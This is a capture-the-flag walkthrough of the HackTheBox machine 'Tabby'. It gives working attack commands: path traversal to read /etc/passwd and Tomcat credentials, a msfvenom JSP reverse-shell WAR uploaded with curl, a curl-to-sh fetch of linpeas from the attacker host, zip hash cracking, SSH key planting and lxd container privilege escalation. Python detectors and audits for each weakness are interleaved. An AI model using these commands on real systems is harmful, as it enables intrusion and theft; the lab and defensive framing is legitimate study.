HackTheBox - Tabby

Morten Hansen • January 30, 2022

Tabby

IP 10.10.10.194

NMAP

```bash
└─$ nmap -sC -sV 10.10.10.194 | tee NMAP/nmap.log
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

HOST

```bash
gobuster vhost -u 10.10.10.194 -w /usr/share/wordlists/dirb/big.txt -t 100
nslookup
server 10.10.10.194
```

Gives nothing regarding possible host domains.


**Browser**
`10.10.10.194` in the browser gives us a webpage for *Mega-hosting*.
<img src="/assets/img/megahosting.png">

The webpage gives us an email address: `sales@megahosting.com`
Most of the links on the webpage seem to go to `#`, but the NEWS tab leads to a PHP script at `http://megahosting.htb/news.php?file=statement`. This also shows that `megahosting.htb` is a hostname and should be added to `/etc/hosts` by inserting `10.10.10.194 megahosting.htb`.

This takes us to a webpage with an apology message about a breach.
The link for the page is `http://megahosting.htb/news.php?file=statement`, and the file is fetched via the `file` query parameter of the PHP script.

`10.10.10.194:8000` gives us another webpage with some basic information about Tomcat.
<img src="/assets/img/tomcat.png">

It points out these paths: 
* The default Tomcat home page is found at `/var/lib/tomcat9/webapps/ROOT/index.html`
* The system instance of Tomcat is installed with CATALINA_HOME in `/usr/share/tomcat9` and CATALINA_BASE in `/var/lib/tomcat9`, following the rules from `/usr/share/doc/tomcat9-common/RUNNING.txt.gz`. 
* Users are defined in `/etc/tomcat9/tomcat-users.xml`

**BURPSUITE**
We proxy the `megahosting.htb/news.php` site through Burp Suite and intercept the request. We send the request to Repeater and change the filename to something we know is on the server. We also try to traverse back up the file structure to reach the root path. The request then looks something like this: 

```http
GET /news.php?file=../../../../../etc/passwd HTTP/1.1
```

This lists the file and we can read:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
....
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
```
By trying different paths, we try to find the `tomcat-users.xml` file mentioned on the `10.10.10.194:8000` website. By trial and error we can see that `/usr/share/tomcat9` is the base path. I found the file at `/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml`.
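From the defender's side, the two things worth having for this `news.php` weakness are a detection over the web server's access log and a fixed version of the file lookup. The following is an added example (not code from the box or from this writeup): it scans constructed Apache access-log lines for `../` sequences in query parameters, including URL-encoded forms, and shows a `safe_news_path()` lookup that only serves names from an allowlisted character set inside a fixed directory. The log lines, the `/srv/news` directory and the function names are assumptions made for the example.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache access-log lines (not taken from the box); the second
# and third mirror the traversal requests sent to news.php in the writeup.
SAMPLE_LOG = """\
10.10.16.4 - - [30/Jan/2022:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1532
10.10.16.4 - - [30/Jan/2022:10:01:09 +0000] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 2210
10.10.16.4 - - [30/Jan/2022:10:01:15 +0000] "GET /news.php?file=..%2F..%2F..%2F..%2F..%2Fusr%2Fshare%2Ftomcat9%2Fetc%2Ftomcat-users.xml HTTP/1.1" 200 1984
10.10.16.4 - - [30/Jan/2022:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 9211
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)


def traversal_hits(log_text):
    """Return (ip, timestamp, parameter, decoded value) for every request whose
    query parameters contain a traversal sequence or an absolute path once
    URL decoding (including a second pass for double encoding) is applied."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlparse(m["target"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                decoded = unquote(unquote(value))  # parse_qs decoded once already
                if "../" in decoded or "..\\" in decoded or decoded.startswith("/"):
                    hits.append((m["ip"], m["ts"], name, decoded))
    return hits


def safe_news_path(user_value, base_dir="/srv/news"):
    """Mitigation for the include: accept only a bare article name and resolve
    it under base_dir. Returns the absolute path, or None if the value is
    rejected. The realpath/commonpath check is kept even though the allowlist
    already rejects '.', '/' and '%', so symlinks under base_dir cannot escape."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+", user_value):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for ip, ts, param, value in traversal_hits(SAMPLE_LOG):
        print(f"{ts} {ip} traversal in parameter {param!r}: {value}")
    print(safe_news_path("statement"))                   # served
    print(safe_news_path("../../../../../etc/passwd"))   # None, rejected
```

Run against a real log, `traversal_hits` would read `/var/log/apache2/access.log` instead of the embedded sample; the allowlist in `safe_news_path` is the actual fix, since stripping `../` after the fact is bypassable by encoding.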

It contained a username and password for Tomcat.

```xml
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
```

This works when accessing `http://10.10.10.194/host-manager/html`, and we get sent to the Tomcat manager page.
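The recovered `tomcat-users.xml` is a good illustration of what an administrator should audit: an account that holds `manager-script` (remote deployment) and `admin-gui`, with its password stored in clear text in a file the web server process could read. The following is an added example, not code from the box or the writeup: it parses a constructed `tomcat-users.xml` modelled on the one above, reports accounts with deploy or admin roles and passwords that are not in Tomcat's `salt$iterations$digest` form (the digest format is an assumption about how a `MessageDigestCredentialHandler` stores credentials), and checks whether a file mode leaves the file world-readable.

```python
import re
import stat
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml resembling the one read through news.php above.
SAMPLE_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
  <user username="viewer" password="x" roles="probe"/>
</tomcat-users>
"""

# Roles that allow deploying applications or reconfiguring the server.
POWERFUL_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                  "manager-status", "admin-gui", "admin-script"}

# Assumed layout of a digested credential: <hex salt>$<iterations>$<hex digest>.
DIGEST_RE = re.compile(r"[0-9a-fA-F]+\$\d+\$[0-9a-fA-F]+")


def audit_tomcat_users(xml_text):
    """Return {username: [issue, ...]} for accounts worth a second look."""
    issues = {}
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":   # strip the XML namespace
            continue
        name = el.get("username", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        password = el.get("password", "")
        found = []
        risky = roles & POWERFUL_ROLES
        if risky:
            found.append("deploy/admin roles: " + ",".join(sorted(risky)))
        if password and not DIGEST_RE.fullmatch(password):
            found.append("password stored in clear text")
        if found:
            issues[name] = found
    return issues


def world_readable(mode):
    """True if 'others' can read the file; tomcat-users.xml should be
    readable only by root and the tomcat group, so any LFI running as
    www-data cannot read it."""
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    for user, found in audit_tomcat_users(SAMPLE_USERS_XML).items():
        print(user, "->", "; ".join(found))
    print("0644 world-readable:", world_readable(0o644))
    print("0640 world-readable:", world_readable(0o640))
```

On a live host the XML would come from `/etc/tomcat9/tomcat-users.xml` and the mode from `os.stat(path).st_mode`; an account that needs `manager-script` for CI deployments should not also carry `admin-gui`, and the manager application itself can be restricted to trusted source addresses with a `RemoteAddrValve`.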

Create a WAR file to deploy to Tomcat:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f war > shell.war
```

Upload it to Tomcat.

```bash
curl --upload-file /home/kali/Documents/machines/tabby/shell.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/shell"
```

Then set up a listener in the terminal with `nc -lvnp 4444` and go to `http://10.10.10.194:8080/shell` in order to connect the reverse shell. We got connected as user `tomcat`. 

I serve `linpeas.sh` from my terminal with `python3 -m http.server 80` and run it in the `/tmp` folder on the victim machine with `curl 10.10.16.4/linpeas.sh | sh | tee text.log`, saving the output with `tee`. It does not give us much, so we have to enumerate ourselves.

Search for files ending in .conf, .db or .sqlite with `find / -iname ".*db.*"`.
Did not find anything. Went back to the tomcat folder at `/var/www/html/files` and found a compressed backup file called `16162020_backup.zip`. I then used the `megahosting.htb/news.php` exploit to download the zip file. 

I then extracted the hash with `zip2john` and edited the hash according to the example hashes for hashcat.

```bash
hashcat -a 0 -m 17225 hash /usr/share/wordlists/rockyou.txt 

#Result
$pkzip2$3*2*1*0*0*24*02f9*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*285c*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5c67*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip2$:admin@it

#password: admin@it
```

Then go into the reverse shell and change user with `su ash` and the password `admin@it`. I then printed out my public key and placed it in a file at `/home/ash/.ssh/authorized_keys`, which I also `chmod 600 authorized_keys` to give it the right permissions.

Then `ssh ash@10.10.10.194` and we get an SSH shell as ash.

I then ran `linpeas.sh` again and got an alert that ash was in the user group `lxd`. After a quick search I found this link: https://www.hackingarticles.in/lxd-privilege-escalation/.

```bash
#download to attack computer
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
#creates a .tar.gz file that we upload to the victim machine with python -m http.server again. 

#at victim computer after uploading the .tar.gz file:
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

lxd init #complete the set up
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

#move to /mnt/root to see the resources of the machine
#move into root/.ssh and configure the authorized_keys file to include our own public key. I used vi to edit the file.

#at attacking machine
ssh root@10.10.10.194
```

This gives us a root-shell that we can connect to using SSH.
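The root step rests on two things a host owner can check for: an unprivileged account in the `lxd` group, and a container created with `security.privileged=true` plus the host root filesystem attached as a disk device. The following is an added example (not code from the box or from the linked article): it parses a constructed `/etc/group` excerpt for membership in groups that are effectively root-equivalent, and scans a constructed `lxc config show`-style YAML dump for the privileged flag and a `source: /` disk device. The group file contents, the container dump and the function names are assumptions for the example; the YAML layout is an approximation of `lxc config show` output.

```python
import re

# Constructed /etc/group excerpt; the lxd line reflects what linpeas reported.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
docker:x:998:
ash:x:1000:
"""

# Constructed, approximate `lxc config show ignite` output.
SAMPLE_CONTAINER_CONFIG = """\
architecture: x86_64
config:
  image.os: alpine
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk
name: ignite
"""

# Membership in any of these lets a user reach root without sudo or a password.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}


def risky_group_members(group_text):
    """Return {group: [members]} for root-equivalent groups that have members."""
    result = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:          # name:password:gid:members
            continue
        name, _, _, members = parts
        if name in ROOT_EQUIVALENT_GROUPS:
            users = [u for u in members.split(",") if u]
            if users:
                result[name] = users
    return result


def container_risk(config_text):
    """Return a list of findings for a container configuration dump."""
    findings = []
    if re.search(r'^\s*security\.privileged:\s*"?true"?\s*$', config_text, re.M):
        findings.append("privileged container: uid 0 inside is uid 0 on the host")
    for m in re.finditer(r"^\s*source:\s*(\S+)\s*$", config_text, re.M):
        if m.group(1) == "/":
            findings.append("host root filesystem attached as a disk device")
    return findings


if __name__ == "__main__":
    for group, users in risky_group_members(SAMPLE_GROUP).items():
        print(f"group {group}: {', '.join(users)}")
    for finding in container_risk(SAMPLE_CONTAINER_CONFIG):
        print("container:", finding)
```

On a real host, read `/etc/group` directly and feed `container_risk` the output of `lxc config show <name>` for each container from `lxc list`; the fix is to keep the `lxd` group empty apart from administrators who already have root.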